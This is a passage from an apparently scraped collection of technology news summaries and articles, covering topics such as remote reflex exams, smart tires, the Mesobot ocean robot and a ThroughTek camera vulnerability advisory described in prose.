based on Twitter tweets between Jan. 21 and May 1, 2020. They sorted people into three groups - liberal versus conservative, pro-science versus anti-science, and hardline versus moderate - then trained machine-learning algorithms to sort all the other people. They used geographical data to pare 115 million tweets worldwide down to 27 million tweets by 2.4 million users in the United States. The researchers further parsed the data by demographics and geography and tracked it over the three-month study period. This approach allowed for near real-time monitoring of partisan and pseudo-science attitudes that could be refined in high detail aided by advanced computing techniques. What emerged is the ability to track public discourse around COVID-19 and compare it with epidemiological outcomes. For example, the researchers found that anti-science attitudes posted between January and April 2020 were high in some Mountain West and Southern states that were later hit with deadly COVID-19 surges. In addition, the researchers were able to probe specific topics important to each group: anti-science conservatives were focused on political topics, including former President Trump's reelection campaigns and QAnon conspiracies, while pro-science conservatives paid attention to global outbreaks of the virus and focused more on preventive measures to "flatten the curve." Researchers were able to track attitudes across time and geography to see how they changed. For example, to their surprise, they found that polarization on the topic of science went down over time. Perhaps most encouraging, they discovered that, even in a highly polarized population, "the number of pro-science, politically moderate users dwarfs other ideological groups, especially anti-science groups." They said their results suggest most people are ready to accept scientific evidence and trust scientists. Social media as a tool to anticipate disease outbreak The findings can also help policymakers and public health officials. If they see anti-science sentiment growing in one region of the country, they can tailor messages to mitigate distrust of science while also preparing for a potential disease outbreak. "Now we can use social media data for science, to create spatial and temporal maps of public opinions along ideological lines, pro- and anti-science lines," said Lerman, a computer scientist and expert in mining social media for clues about human behavior at USC's Information Sciences Institute. "We can also see what topics are important to these segments of society, and we can plan proactively to prevent disease outbreaks from happening." Support for the study comes from the Air Force Office of Scientific Research (grant FA9550-20-1-0224) and the Defense Advanced Research Projects Agency (DARPA, grant W911NF-17-C-0094). The study authors are Lerman, Ashwin Rao, Fred Morstatter, Minda Hu, Emily Chen, Keith Burghardt and Emilio Ferrara of the Information Sciences Institute. The work was supported in part by the Air Force Office of Scientific Research and the Defense Advanced Research Projects Agency. Illustration credit: iStock
228
If I Had a Hammer: A Simple Tool to Enable Remote Neurological Examinations
In the early weeks of the COVID-19 pandemic, clinics and patients alike began cancelling all non-urgent appointments and procedures in order to slow the spread of the coronavirus. A boom in telemedicine was borne out of necessity as healthcare workers, administrators, and scientists creatively advanced technologies to fill a void in care. During this time, Georgia Institute of Technology professor Jun Ueda and Ph.D. student Waiman Meinhold, along with their collaborators at NITI-ON Co. and Tohoku University in Japan, began to explore how they might contribute. By employing their previously engineered "smart" tendon hammer and developing a mobile app to accompany it, Meinhold, Ueda, and their collaborators devised a system that enables the deep tendon reflex exam to be performed remotely, filling a gap in neurological healthcare delivery. The deep tendon reflex exam is both a basic and crucial part of neurological assessment and is often the first step in identifying neurological illnesses. The traditional exam consists of two main parts. First, using a silicone hammer, a physician taps on a patient's tendon to trigger a reflex response. Next, the physician grades the reflex on a numerical scale. To characterize the reflex, a trained physician relies primarily on previous experience, visual cues, and the "feel" of the hammer rebounding in their hand. Until now, the physical act of reflex elicitation has been completely out of reach for telemedicine. Hitting the correct spot on the tendon is crucial and is necessary in order to elicit a proper reflex response. According to Meinhold and Ueda's research, a patient's caretaker or family member may be able to easily step in to assist with this critical component of the neurological exam. They will simply need to obtain the smart tendon hammer and download the accompanying mobile application for data analysis. To make this advance possible, Meinhold and Ueda modified a standard commercially available reflex hammer by furnishing it with a small wireless Inertial Measurement Unit (IMU) capable of measuring and streaming the hammer's acceleration data. In the course of their research, Meinhold and Ueda proved that by taking the hammer's acceleration measurements from on-tendon and off-tendon locations and running them through a classification algorithm, they can reliably distinguish whether or not the hammer has hit the correct spot. How would this remote exam work, exactly? Equipped with the smart hammer, the lay person uses the app to select which tendon they will test (bicep, Achilles, patellar, etc.), which calls up the pre-programmed "classifier" for that particular tendon. These "classifiers" are basic forms of artificial intelligence that use aggregated acceleration data collected from experiments to categorize each tap into one of two categories: correct or incorrect. The lay person then uses the smart tendon hammer to administer a tap on the patient's tendon. As contact is made, the hammer streams acceleration data via Bluetooth to the app, which interprets the data and gives instant feedback to the user about whether they have tapped the correct location. In addition, colored LEDs on the hammer indicate a tap's success, with a green light indicating a correct tap and a red light indicating an incorrect tap. The user is prompted to keep tapping until they log several correct taps. Crucially, Meinhold and Ueda showed that lay people can adequately perform tendon tapping. Their research appeared in the peer-reviewed journal Frontiers in Robotics and AI on March 16, 2021. There, moving their smart hammer closer to clinical implementation, Meinhold and Ueda directly compared the manual tapping variability between a novice and a trained clinician. The results were reassuring. The team found that while novices had more variability in their tapping than clinicians, their skill level was adequate. They reliably elicited tendon reflexes. Their research demonstrates that a tool is within reach to allow for remote implementation of deep tendon reflex exam. But could lay users also aid in grading reflexes? The work by Meinhold and Ueda suggests that non-experts may be able to help. To investigate this, they tested a simple training scheme. They provided participants and physicians with a training video on how to grade reflexes, and then assigned unlabeled videos for them to score. They found that while novices were able to grade reflexes with relatively low error rates, expert physicians outperformed them. Physicians excelled at grading from video, making no errors. To access this expert grading, Meinhold and Ueda envision that through the app, lay users could upload videos of the tendon tapping and reflex response. Physicians could then easily grade the patient's reflexes from their office. By revolutionizing a traditional neurological assessment procedure, the smart hammer system developed at Georgia Tech is poised to kick-start a new wave in telemedicine. Text - Catherine Barzler Images - Christa Ernst A Smart Tendon Hammer System for Remote Neurological Examination W. Meinhold, Y.Yamakawa, H. Honda, T. Mori, S. Izumi and Jun Ueda Fontiers in Robotics and AI, #8, 2021 DOI=10.3389/frobt.2021.618656
Researchers at the Georgia Institute of Technology, in collaboration with Japan's Tohoku University and NITI-ON Co., have developed a mobile app for use with their "smart" tendon hammer to allow remote deep tendon reflex exams, the first step in identifying neurological illnesses. To determine whether the hammer has hit the correct spot on the tendon to elicit a proper reflex response, the researchers added a small wireless inertial measurement unit to a standard commercially available reflex hammer. The hammer's acceleration measurements from on-tendon and off-tendon locations are run through a classification algorithm, and the patient receives instant feedback as to whether the hammer has hit the correct spot. Physicians grade patients' reflexes by reviewing videos of the tendon tapping and reflex response uploaded by the patient through the app.
[]
[]
[]
scitechnews
None
None
None
None
Researchers at the Georgia Institute of Technology, in collaboration with Japan's Tohoku University and NITI-ON Co., have developed a mobile app for use with their "smart" tendon hammer to allow remote deep tendon reflex exams, the first step in identifying neurological illnesses. To determine whether the hammer has hit the correct spot on the tendon to elicit a proper reflex response, the researchers added a small wireless inertial measurement unit to a standard commercially available reflex hammer. The hammer's acceleration measurements from on-tendon and off-tendon locations are run through a classification algorithm, and the patient receives instant feedback as to whether the hammer has hit the correct spot. Physicians grade patients' reflexes by reviewing videos of the tendon tapping and reflex response uploaded by the patient through the app. In the early weeks of the COVID-19 pandemic, clinics and patients alike began cancelling all non-urgent appointments and procedures in order to slow the spread of the coronavirus. A boom in telemedicine was borne out of necessity as healthcare workers, administrators, and scientists creatively advanced technologies to fill a void in care. During this time, Georgia Institute of Technology professor Jun Ueda and Ph.D. student Waiman Meinhold, along with their collaborators at NITI-ON Co. and Tohoku University in Japan, began to explore how they might contribute. By employing their previously engineered "smart" tendon hammer and developing a mobile app to accompany it, Meinhold, Ueda, and their collaborators devised a system that enables the deep tendon reflex exam to be performed remotely, filling a gap in neurological healthcare delivery. The deep tendon reflex exam is both a basic and crucial part of neurological assessment and is often the first step in identifying neurological illnesses. The traditional exam consists of two main parts. First, using a silicone hammer, a physician taps on a patient's tendon to trigger a reflex response. Next, the physician grades the reflex on a numerical scale. To characterize the reflex, a trained physician relies primarily on previous experience, visual cues, and the "feel" of the hammer rebounding in their hand. Until now, the physical act of reflex elicitation has been completely out of reach for telemedicine. Hitting the correct spot on the tendon is crucial and is necessary in order to elicit a proper reflex response. According to Meinhold and Ueda's research, a patient's caretaker or family member may be able to easily step in to assist with this critical component of the neurological exam. They will simply need to obtain the smart tendon hammer and download the accompanying mobile application for data analysis. To make this advance possible, Meinhold and Ueda modified a standard commercially available reflex hammer by furnishing it with a small wireless Inertial Measurement Unit (IMU) capable of measuring and streaming the hammer's acceleration data. In the course of their research, Meinhold and Ueda proved that by taking the hammer's acceleration measurements from on-tendon and off-tendon locations and running them through a classification algorithm, they can reliably distinguish whether or not the hammer has hit the correct spot. How would this remote exam work, exactly? Equipped with the smart hammer, the lay person uses the app to select which tendon they will test (bicep, Achilles, patellar, etc.), which calls up the pre-programmed "classifier" for that particular tendon. These "classifiers" are basic forms of artificial intelligence that use aggregated acceleration data collected from experiments to categorize each tap into one of two categories: correct or incorrect. The lay person then uses the smart tendon hammer to administer a tap on the patient's tendon. As contact is made, the hammer streams acceleration data via Bluetooth to the app, which interprets the data and gives instant feedback to the user about whether they have tapped the correct location. In addition, colored LEDs on the hammer indicate a tap's success, with a green light indicating a correct tap and a red light indicating an incorrect tap. The user is prompted to keep tapping until they log several correct taps. Crucially, Meinhold and Ueda showed that lay people can adequately perform tendon tapping. Their research appeared in the peer-reviewed journal Frontiers in Robotics and AI on March 16, 2021. There, moving their smart hammer closer to clinical implementation, Meinhold and Ueda directly compared the manual tapping variability between a novice and a trained clinician. The results were reassuring. The team found that while novices had more variability in their tapping than clinicians, their skill level was adequate. They reliably elicited tendon reflexes. Their research demonstrates that a tool is within reach to allow for remote implementation of deep tendon reflex exam. But could lay users also aid in grading reflexes? The work by Meinhold and Ueda suggests that non-experts may be able to help. To investigate this, they tested a simple training scheme. They provided participants and physicians with a training video on how to grade reflexes, and then assigned unlabeled videos for them to score. They found that while novices were able to grade reflexes with relatively low error rates, expert physicians outperformed them. Physicians excelled at grading from video, making no errors. To access this expert grading, Meinhold and Ueda envision that through the app, lay users could upload videos of the tendon tapping and reflex response. Physicians could then easily grade the patient's reflexes from their office. By revolutionizing a traditional neurological assessment procedure, the smart hammer system developed at Georgia Tech is poised to kick-start a new wave in telemedicine. Text - Catherine Barzler Images - Christa Ernst A Smart Tendon Hammer System for Remote Neurological Examination W. Meinhold, Y.Yamakawa, H. Honda, T. Mori, S. Izumi and Jun Ueda Fontiers in Robotics and AI, #8, 2021 DOI=10.3389/frobt.2021.618656
229
Smart Tires Hit the Road
The technology is geared toward vehicles that specialize in last-mile delivery, which refers to the final step in getting packages from a distribution center to the customer. The market for last-mile delivery has picked up as online shopping has soared during the coronavirus pandemic. Goodyear's new technology, announced Wednesday, is called SightLine and includes a sensor and proprietary machine-learning algorithms that can predict flat tires or other issues days ahead of time, by measuring tire wear, pressure, road-surface conditions and many other factors. The surge of last-mile deliveries during the pandemic means that a lot of vehicles are on the road, "stopping and going, hitting curbs, causing damage to the tires, causing breakdowns and congestion," said Richard Kramer, chief executive of Akron, Ohio-based Goodyear. The last-mile delivery market is expected to grow to almost $70 billion by 2025, up from about $40 billion in 2020, according to technology research firm Gartner Inc. The volume of parcels is expected to grow to 200 billion in 2025, up from an estimated 100 billion in 2019, according to Gartner. In a pilot test with about 1,000 vehicles operated by 20 customers, including some of Amazon's delivery service partners, SightLine was able to detect 90% of their tire-related issues ahead of time, said Chris Helsel, Goodyear's senior vice president of global operations and chief technology officer. SightLine builds off sensor technology that has been in the works for several years. Goodyear already sells tires to large commercial trucking customers that can measure temperature and pressure, but the SightLine system contains more advanced technology, Mr. Helsel said, including a sensor that tracks dozens of measurements such as tire wear, inflation and road-surface conditions and a battery that detects temperature, pressure, acceleration and vibration. The system also includes a device that ingests data and communicates with Goodyear's cloud, which analyzes the data in real time using proprietary machine-learning algorithms, Mr. Helsel said. Vehicles using Goodyear's intelligent tires can shorten the stopping distance lost by wear and tear on a tire by about 30%, he said. Last-mile delivery vehicles can go through four sets of tires a year, which is highly inefficient from a cost and sustainability perspective, said Nizar Trigui, CTO at Nashville-based Bridgestone Americas, a subsidiary of Bridgestone Corp. The company, which has historically focused on customers in the long-haul trucking sector, is developing an intelligent tire system that uses sensors, AI algorithms and "digital twins," which are digital representations of physical tires on vehicles, to predict when tires will wear out on delivery vehicles and whether the tires are still in good health for retreading. Putting a new tread on a used tire that still has life in it is better for the environment than sending it to a landfill, Mr. Trigui said. Compared with new tires, retreaded tires reduce carbon emissions by 24% and reduce air pollution by 21%, according to the company. The technology is currently in the final stages of testing with last-mile delivery partners and will launch in the coming months, Mr. Trigui said. Bridgestone Americas already has several intelligent tire features available for customers in the mining and commercial trucking industries. Helping detect tire-related problems before they happen can lead to fewer breakdowns, less traffic congestion and increased safety for last-mile delivery drivers, said Bart De Muynck, vice president analyst at Gartner's supply chain practice. Tire manufacturers are investing more heavily in the field of telematics, which refers to the use of technology to collect and monitor data relating to a vehicle or parts of a vehicle, he said. Telematics is expected to become an important part of electric vehicles and self-driving cars in the future, to get more information about a vehicle's maintenance status, emissions and safety at any given point in time, he said. Making drivers aware of potential tire-related problems ahead of time makes good business sense, too, he said, since drivers will pay to get tires serviced. Large portions of tire makers' revenue is now coming from the services side, as people are buying fewer cars overall. "Having access to the data, not just when you make the product but when you sell it [will] allow you to serve your customers on an ongoing basis," Mr. De Muynck said. Write to Sara Castellanos at [email protected]
Tire manufacturers Goodyear Tire & Rubber and Bridgestone are launching new smart tire features for last-mile delivery vehicles transporting packages from e-commerce sites like Amazon.com. Goodyear's SightLine solution runs data from a sensor through proprietary machine learning algorithms to capture tire wear, pressure, road-surface conditions, and other variables to forecast flats or other problems days ahead of time. Goodyear's Chris Helsel said SightLine could detect 90% of tire-related issues ahead of time in a test that involved about 1,000 vehicles operated by 20 customers. Meanwhile, Bridgestone Americas is developing an intelligent tire system that combines sensors, artificial intelligence algorithms, and digital twins to predict tire wear and readiness for retreading.
[]
[]
[]
scitechnews
None
None
None
None
Tire manufacturers Goodyear Tire & Rubber and Bridgestone are launching new smart tire features for last-mile delivery vehicles transporting packages from e-commerce sites like Amazon.com. Goodyear's SightLine solution runs data from a sensor through proprietary machine learning algorithms to capture tire wear, pressure, road-surface conditions, and other variables to forecast flats or other problems days ahead of time. Goodyear's Chris Helsel said SightLine could detect 90% of tire-related issues ahead of time in a test that involved about 1,000 vehicles operated by 20 customers. Meanwhile, Bridgestone Americas is developing an intelligent tire system that combines sensors, artificial intelligence algorithms, and digital twins to predict tire wear and readiness for retreading. The technology is geared toward vehicles that specialize in last-mile delivery, which refers to the final step in getting packages from a distribution center to the customer. The market for last-mile delivery has picked up as online shopping has soared during the coronavirus pandemic. Goodyear's new technology, announced Wednesday, is called SightLine and includes a sensor and proprietary machine-learning algorithms that can predict flat tires or other issues days ahead of time, by measuring tire wear, pressure, road-surface conditions and many other factors. The surge of last-mile deliveries during the pandemic means that a lot of vehicles are on the road, "stopping and going, hitting curbs, causing damage to the tires, causing breakdowns and congestion," said Richard Kramer, chief executive of Akron, Ohio-based Goodyear. The last-mile delivery market is expected to grow to almost $70 billion by 2025, up from about $40 billion in 2020, according to technology research firm Gartner Inc. The volume of parcels is expected to grow to 200 billion in 2025, up from an estimated 100 billion in 2019, according to Gartner. In a pilot test with about 1,000 vehicles operated by 20 customers, including some of Amazon's delivery service partners, SightLine was able to detect 90% of their tire-related issues ahead of time, said Chris Helsel, Goodyear's senior vice president of global operations and chief technology officer. SightLine builds off sensor technology that has been in the works for several years. Goodyear already sells tires to large commercial trucking customers that can measure temperature and pressure, but the SightLine system contains more advanced technology, Mr. Helsel said, including a sensor that tracks dozens of measurements such as tire wear, inflation and road-surface conditions and a battery that detects temperature, pressure, acceleration and vibration. The system also includes a device that ingests data and communicates with Goodyear's cloud, which analyzes the data in real time using proprietary machine-learning algorithms, Mr. Helsel said. Vehicles using Goodyear's intelligent tires can shorten the stopping distance lost by wear and tear on a tire by about 30%, he said. Last-mile delivery vehicles can go through four sets of tires a year, which is highly inefficient from a cost and sustainability perspective, said Nizar Trigui, CTO at Nashville-based Bridgestone Americas, a subsidiary of Bridgestone Corp. The company, which has historically focused on customers in the long-haul trucking sector, is developing an intelligent tire system that uses sensors, AI algorithms and "digital twins," which are digital representations of physical tires on vehicles, to predict when tires will wear out on delivery vehicles and whether the tires are still in good health for retreading. Putting a new tread on a used tire that still has life in it is better for the environment than sending it to a landfill, Mr. Trigui said. Compared with new tires, retreaded tires reduce carbon emissions by 24% and reduce air pollution by 21%, according to the company. The technology is currently in the final stages of testing with last-mile delivery partners and will launch in the coming months, Mr. Trigui said. Bridgestone Americas already has several intelligent tire features available for customers in the mining and commercial trucking industries. Helping detect tire-related problems before they happen can lead to fewer breakdowns, less traffic congestion and increased safety for last-mile delivery drivers, said Bart De Muynck, vice president analyst at Gartner's supply chain practice. Tire manufacturers are investing more heavily in the field of telematics, which refers to the use of technology to collect and monitor data relating to a vehicle or parts of a vehicle, he said. Telematics is expected to become an important part of electric vehicles and self-driving cars in the future, to get more information about a vehicle's maintenance status, emissions and safety at any given point in time, he said. Making drivers aware of potential tire-related problems ahead of time makes good business sense, too, he said, since drivers will pay to get tires serviced. Large portions of tire makers' revenue is now coming from the services side, as people are buying fewer cars overall. "Having access to the data, not just when you make the product but when you sell it [will] allow you to serve your customers on an ongoing basis," Mr. De Muynck said. Write to Sara Castellanos at [email protected]
230
Amazon Brings Cashierless Tech to Full-Size Grocery Store
Amazon has deployed its Just Walk Out cashierless retail system in its newest Seattle-based Amazon Fresh physical grocery outlet, its first use in a full-size store. Just Walk Out utilizes cameras and sensors to log items selected by customers, eliminating the need for checkout lines; shoppers scan their phones when they enter the store, and just "walk out" after loading their basket or cart. The new store, in the Factoria neighborhood of Bellevue, WA, also will feature Amazon One, the retailer's palm-scanning ID system that recently was adopted by Whole Foods stores.
[]
[]
[]
scitechnews
None
None
None
None
Amazon has deployed its Just Walk Out cashierless retail system in its newest Seattle-based Amazon Fresh physical grocery outlet, its first use in a full-size store. Just Walk Out utilizes cameras and sensors to log items selected by customers, eliminating the need for checkout lines; shoppers scan their phones when they enter the store, and just "walk out" after loading their basket or cart. The new store, in the Factoria neighborhood of Bellevue, WA, also will feature Amazon One, the retailer's palm-scanning ID system that recently was adopted by Whole Foods stores.
231
Underwater Robot Offers Insight into Mid-Ocean 'Twilight Zone'
Woods Hole, MA (June 16, 2021) -- An innovative underwater robot known as Mesobot is providing researchers with deeper insight into the vast mid-ocean region known as the "twilight zone." Capable of tracking and recording high-resolution images of slow-moving and fragile zooplankton, gelatinous animals, and particles, Mesobot greatly expands scientists' ability to observe creatures in their mesopelagic habitat with minimal disturbance. This advance in engineering will enable greater understanding of the role these creatures play in transporting carbon dioxide from the atmosphere to the deep sea, as well as how commercial exploitation of twilight zone fisheries might affect the marine ecosystem. In a paper published June 16 in Science Robotics , Woods Hole Oceanographic Institution (WHOI) senior scientist Dana Yoerger presents Mesobot as a versatile vehicle for achieving a number of science objectives in the twilight zone. " Mesobot was conceived to complement and fill important gaps not served by existing technologies and platforms," said Yoerger. "We expect that Mesobot will emerge as a vital tool for observing midwater organisms for extended periods, as well as rapidly identifying species observed from vessel biosonars. Because Mesobot can survey, track, and record compelling imagery, we hope to reveal previously unknown behaviors, species interactions, morphological structures, and the use of bioluminescence." Co-authored by research scientists and engineers from WHOI, MBARI (Monterey Bay Aquarium Research Institute), and Stanford University, the paper outlines the robot's success in autonomously tracking two gelatinous marine creatures during a 2019 research cruise in Monterey Bay. High-definition video revealed a "dinner plate" jellyfish "ramming" a siphonophore, which narrowly escaped the jelly's venomous tentacles. Mesobot also recorded a 30-minute video of a giant larvacean, which appears to be nearly motionless but is actually riding internal waves that rise and fall 6 meters (20 feet). These observations represent the first time that a self-guided robot has tracked these small, clear creatures as they move through the water column like a "parcel of water," said Yoerger. " Mesobot has the potential to change how we observe animals moving through space and time in a way that we've never been able to do before," said Kakani Katija, MBARI principal engineer. "As we continue to develop and improve on the vehicle, we hope to observe many other mysterious and captivating animals in the midwaters of the ocean, including the construction and disposal of carbon-rich giant larvacean 'snot palaces.'"
Scientists at the Woods Hole Oceanographic Institution (WHOI), the Monterey Bay Aquarium Research Institute (MBARI), and Stanford University used the underwater robot Mesobot to track and capture high-resolution images of slow-moving organisms inhabiting the mid-ocean "twilight zone" region. Mesobot uses an array of oceanographic and acoustic survey sensors, and can be operated remotely through a fiberoptic cable linked to a ship, follow pre-programmed missions, or autonomously track targets at depths of up to 1,000 meters (3,300 feet). MBARI's Kakani Katija said, "Mesobot has the potential to change how we observe animals moving through space and time in a way that we've never been able to do before."
[]
[]
[]
scitechnews
None
None
None
None
Scientists at the Woods Hole Oceanographic Institution (WHOI), the Monterey Bay Aquarium Research Institute (MBARI), and Stanford University used the underwater robot Mesobot to track and capture high-resolution images of slow-moving organisms inhabiting the mid-ocean "twilight zone" region. Mesobot uses an array of oceanographic and acoustic survey sensors, and can be operated remotely through a fiberoptic cable linked to a ship, follow pre-programmed missions, or autonomously track targets at depths of up to 1,000 meters (3,300 feet). MBARI's Kakani Katija said, "Mesobot has the potential to change how we observe animals moving through space and time in a way that we've never been able to do before." Woods Hole, MA (June 16, 2021) -- An innovative underwater robot known as Mesobot is providing researchers with deeper insight into the vast mid-ocean region known as the "twilight zone." Capable of tracking and recording high-resolution images of slow-moving and fragile zooplankton, gelatinous animals, and particles, Mesobot greatly expands scientists' ability to observe creatures in their mesopelagic habitat with minimal disturbance. This advance in engineering will enable greater understanding of the role these creatures play in transporting carbon dioxide from the atmosphere to the deep sea, as well as how commercial exploitation of twilight zone fisheries might affect the marine ecosystem. In a paper published June 16 in Science Robotics , Woods Hole Oceanographic Institution (WHOI) senior scientist Dana Yoerger presents Mesobot as a versatile vehicle for achieving a number of science objectives in the twilight zone. " Mesobot was conceived to complement and fill important gaps not served by existing technologies and platforms," said Yoerger. "We expect that Mesobot will emerge as a vital tool for observing midwater organisms for extended periods, as well as rapidly identifying species observed from vessel biosonars. Because Mesobot can survey, track, and record compelling imagery, we hope to reveal previously unknown behaviors, species interactions, morphological structures, and the use of bioluminescence." Co-authored by research scientists and engineers from WHOI, MBARI (Monterey Bay Aquarium Research Institute), and Stanford University, the paper outlines the robot's success in autonomously tracking two gelatinous marine creatures during a 2019 research cruise in Monterey Bay. High-definition video revealed a "dinner plate" jellyfish "ramming" a siphonophore, which narrowly escaped the jelly's venomous tentacles. Mesobot also recorded a 30-minute video of a giant larvacean, which appears to be nearly motionless but is actually riding internal waves that rise and fall 6 meters (20 feet). These observations represent the first time that a self-guided robot has tracked these small, clear creatures as they move through the water column like a "parcel of water," said Yoerger. " Mesobot has the potential to change how we observe animals moving through space and time in a way that we've never been able to do before," said Kakani Katija, MBARI principal engineer. "As we continue to develop and improve on the vehicle, we hope to observe many other mysterious and captivating animals in the midwaters of the ocean, including the construction and disposal of carbon-rich giant larvacean 'snot palaces.'"
232
Autonomous Walking Excavator Can Build Walls, Dig Trenches
A construction vehicle can operate autonomously on rough terrain, thanks to a team of Swiss-German engineers that adapted a walking excavator to perform various tasks. Researchers at ETH Zurich in Switzerland made the prototype Hydraulic Excavator for an Autonomous Purpose (HEAP) autonomous through the use of algorithms, control mechanisms, and Light Detection and Ranging (LiDAR). The 12-ton HEAP was programmed to use an excavator bucket and a two-finger gripper, and was able to construct a four-meter (13-foot) -high stone wall, grab trees for mock forestry work, and dig out a trench containing live ammunition from World War II. ETH Zurich's Dominic Jud said one of the biggest challenges in switching the excavator from human operation to a computer running open source Ubuntu software was reengineering the cabin controls to drive the hydraulic pumps. Jud said HEAP is roughly as accurate as human operators in executing tasks, although not yet as quick.
[]
[]
[]
scitechnews
None
None
None
None
A construction vehicle can operate autonomously on rough terrain, thanks to a team of Swiss-German engineers that adapted a walking excavator to perform various tasks. Researchers at ETH Zurich in Switzerland made the prototype Hydraulic Excavator for an Autonomous Purpose (HEAP) autonomous through the use of algorithms, control mechanisms, and Light Detection and Ranging (LiDAR). The 12-ton HEAP was programmed to use an excavator bucket and a two-finger gripper, and was able to construct a four-meter (13-foot) -high stone wall, grab trees for mock forestry work, and dig out a trench containing live ammunition from World War II. ETH Zurich's Dominic Jud said one of the biggest challenges in switching the excavator from human operation to a computer running open source Ubuntu software was reengineering the cabin controls to drive the hydraulic pumps. Jud said HEAP is roughly as accurate as human operators in executing tasks, although not yet as quick.
233
ThroughTek Flaw Opens Millions of Connected Cameras to Eavesdropping
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday issued an advisory regarding a critical software supply-chain flaw impacting ThroughTek's software development kit (SDK) that could be abused by an adversary to gain improper access to audio and video streams. "Successful exploitation of this vulnerability could permit unauthorized access to sensitive information, such as camera audio/video feeds," CISA said in the alert. ThroughTek's point-to-point ( P2P ) SDK is widely used by IoT devices with video surveillance or audio/video transmission capability such as IP cameras, baby and pet monitoring cameras, smart home appliances, and sensors to provide remote access to the media content over the internet. Tracked as CVE-2021-32934 (CVSS score: 9.1), the shortcoming affects ThroughTek P2P products, versions 3.1.5 and before as well as SDK versions with nossl tag, and stems from a lack of sufficient protection when transferring data between the local device and ThroughTek's servers. The flaw was reported by Nozomi Networks in March 2021, which noted that the use of vulnerable security cameras could leave critical infrastructure operators at risk by exposing sensitive business, production, and employee information. "The [P2P] protocol used by ThroughTek lacks a secure key exchange [and] relies instead on an obfuscation scheme based on a fixed key," the San Francisco-headquartered IoT security firm said . "Since this traffic traverses the internet, an attacker that is able to access it can reconstruct the audio/video stream." To demonstrate the vulnerability, the researchers created a proof-of-concept (PoC) exploit that deobfuscates on-the-fly packets from the network traffic. ThroughTek recommends original equipment manufacturers (OEMs) using SDK 3.1.10 and above to enable AuthKey and DTLS , and those relying on an SDK version prior to 3.1.10 to upgrade the library to version 3.3.1.0 or v3.4.2.0 and enable AuthKey/DTLS. Since the flaw affects a software component that's part of the supply chain for many OEMs of consumer-grade security cameras and IoT devices, the fallout from such an exploitation could effectively breach the security of the devices, enabling the attacker to access and view confidential audio or video streams. "Because ThroughTek's P2P library has been integrated by multiple vendors into many different devices over the years, it's virtually impossible for a third-party to track the affected products," the researchers said.
An advisory issued by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) warns of a major software supply-chain flaw in cloud security provider ThroughTek's point-to-point (P2P) software development kit (SDK), which could allow unauthorized access to the audio and video streams from millions of connected cameras. The flaw stems from insufficient protection when transferring data between the local device and ThroughTek's servers; it impacts ThroughTek P2P product versions 3.1.5 and before, and SDK versions with NoSSL tag. Security firm Nozomi Networks reported the bug in March, warning that vulnerable security cameras could place critical infrastructure operators at risk by compromising sensitive business, production, and employee data.
[]
[]
[]
scitechnews
None
None
None
None
An advisory issued by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) warns of a major software supply-chain flaw in cloud security provider ThroughTek's point-to-point (P2P) software development kit (SDK), which could allow unauthorized access to the audio and video streams from millions of connected cameras. The flaw stems from insufficient protection when transferring data between the local device and ThroughTek's servers; it impacts ThroughTek P2P product versions 3.1.5 and before, and SDK versions with NoSSL tag. Security firm Nozomi Networks reported the bug in March, warning that vulnerable security cameras could place critical infrastructure operators at risk by compromising sensitive business, production, and employee data. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday issued an advisory regarding a critical software supply-chain flaw impacting ThroughTek's software development kit (SDK) that could be abused by an adversary to gain improper access to audio and video streams. "Successful exploitation of this vulnerability could permit unauthorized access to sensitive information, such as camera audio/video feeds," CISA said in the alert. ThroughTek's point-to-point ( P2P ) SDK is widely used by IoT devices with video surveillance or audio/video transmission capability such as IP cameras, baby and pet monitoring cameras, smart home appliances, and sensors to provide remote access to the media content over the internet. Tracked as CVE-2021-32934 (CVSS score: 9.1), the shortcoming affects ThroughTek P2P products, versions 3.1.5 and before as well as SDK versions with nossl tag, and stems from a lack of sufficient protection when transferring data between the local device and ThroughTek's servers. The flaw was reported by Nozomi Networks in March 2021, which noted that the use of vulnerable security cameras could leave critical infrastructure operators at risk by exposing sensitive business, production, and employee information. "The [P2P] protocol used by ThroughTek lacks a secure key exchange [and] relies instead on an obfuscation scheme based on a fixed key," the San Francisco-headquartered IoT security firm said . "Since this traffic traverses the internet, an attacker that is able to access it can reconstruct the audio/video stream." To demonstrate the vulnerability, the researchers created a proof-of-concept (PoC) exploit that deobfuscates on-the-fly packets from the network traffic. ThroughTek recommends original equipment manufacturers (OEMs) using SDK 3.1.10 and above to enable AuthKey and DTLS , and those relying on an SDK version prior to 3.1.10 to upgrade the library to version 3.3.1.0 or v3.4.2.0 and enable AuthKey/DTLS. Since the flaw affects a software component that's part of the supply chain for many OEMs of consumer-grade security cameras and IoT devices, the fallout from such an exploitation could effectively breach the security of the devices, enabling the attacker to access and view confidential audio or video streams. "Because ThroughTek's P2P library has been integrated by multiple vendors into many different devices over the years, it's virtually impossible for a third-party to track the affected products," the researchers said.
235
Biomimetic Resonant Acoustic Sensor Detecting Far-Distant Voices Accurately to Hit the Market
A KAIST research team led by Professor Keon Jae Lee from the Department of Materials Science and Engineering has developed a bioinspired flexible piezoelectric acoustic sensor with multi-resonant ultrathin piezoelectric membrane mimicking the basilar membrane of the human cochlea. The flexible acoustic sensor has been miniaturized for embedding into smartphones and the first commercial prototype is ready for accurate and far-distant voice detection. In 2018, P rofessor Lee presented the first concept of a flexible piezoelectric acoustic senso r , inspired by the fact that humans can accurately detect far-distant voices using a multi-resonant trapezoidal membrane with 20,000 hair cells. However, previous acoustic sensors could not be integrated into commercial products like smartphones and AI speakers due to their large device size. In this work, the research team fabricated a mobile-sized acoustic sensor by adopting ultrathin piezoelectric membranes with high sensitivity. Simulation studies proved that the ultrathin polymer underneath inorganic piezoelectric thin film can broaden the resonant bandwidth to cover the entire voice frequency range using seven channels. Based on this theory, the research team successfully demonstrated the miniaturized acoustic sensor mounted in commercial smartphones and AI speakers for machine learning-based biometric authentication and voice processing. (Please refer to the explanatory movie KAIST Flexible Piezoelectric Mobile Acoustic Sensor ). The resonant mobile acoustic sensor has superior sensitivity and multi-channel signals compared to conventional condenser microphones with a single channel, and it has shown highly accurate and far-distant speaker identification with a small amount of voice training data. The error rate of speaker identification was significantly reduced by 56% (with 150 training datasets) and 75% (with 2,800 training datasets) compared to that of a MEMS condenser device. Professor Lee said, "Recently, Google has been targeting the 'Wolverine Project' on far-distant voice separation from multi-users for next-generation AI user interfaces. I expect that our multi-channel resonant acoustic 